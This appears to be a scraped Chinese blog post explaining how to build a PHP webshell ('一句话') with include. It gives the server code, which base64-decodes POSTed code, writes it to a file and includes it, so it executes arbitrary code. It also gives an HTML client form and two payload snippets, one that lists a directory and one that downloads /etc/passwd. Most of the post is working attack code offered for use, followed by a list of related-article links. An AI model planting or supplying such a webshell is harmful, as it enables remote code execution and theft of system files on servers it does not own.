使用include实现php一句话
来源:互联网 发布:淘宝我的阿里在哪里找 编辑:程序博客网 时间:2024/06/06 01:52
我是菜牛各位看官轻喷。
PHP一句话主要实现的是,动态执行PHP代码。
PHP小马主要实现的是,文件上传。
PHP大马主要实现的是,提权。
include 语句包含并运行指定文件。
<?php//服务端if(!empty($_POST['code'])){$code=trim($_POST['code']);$handle=fopen('cmd.txt','w') or die('创建文件失败');fputs($handle,base64_decode($code)) or die('写入文件失败');fclose($handle);if(file_exists('cmd.txt')){include 'cmd.txt';}}?>
<html> <head><title>简易一句话客户端</title></head> <body> <form method='post' action='test2.php' name='fcode' target='_blank' <textarea rows='15' cols='30' name='code'> </textarea><br /> <input type='submit' value='submit' name='submit' /> <input type='reset' value='reset' name='reset' /> </form> </body></html>
最后附上两个shellcode,一个用于目录遍历,一个用于文件下载。
<?php//目录遍历$d = dir("/tmp");echo "Path: " . $d->path . "<br />";while (false !== ($entry = $d->read())) { echo $entry."<br />";}$d->close();?>
<?php//文件下载$file = '/etc/passwd';if (file_exists($file)) { header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename='.basename($file)); header('Content-Length: ' . filesize($file)); ob_clean(); flush(); readfile($file); exit;}?>
0 0
- 使用include实现php一句话
- PHP一句话实现URL地址跳转
- php使用php include之后页首有空白
- php的include功能实现:用于在内存合并文件而非读入替换再存盘再载入使用include
- include|require(_once)? 在php底层实现
- PHP一句话实现获取文件夹下的文件
- php使用include制作模板页
- PHP, 不要使用(include/require)_once
- php的include()中使用GET数据
- php中使用include 或者require
- php include方法使用的问题
- php的require和include使用详解
- 一句话备忘PHP
- PHP执行命令一句话
- php一句话免杀
- php变异一句话
- 最新php一句话
- PHP一句话后门
- android webView使用方法
- Virtualbox鼠标移入移出linux时自动切换
- SOCKET, TCP/UDP, HTTP, FTP 浅析
- Javascript 严格模式详解 use strict
- 反射执行类的方法
- 使用include实现php一句话
- struct hw_module_t HAL_MODULE_INFO_SYM
- 华为的JAVA面试题
- PID&VID
- lua语言基础
- Android-4.0源码结构
- spingmvc 上传文件, poi解析xls,xlsx
- lirc红外学习irrecord
- 谈谈Unicode编码,简要解释UCS、UTF、BMP、BOM等名词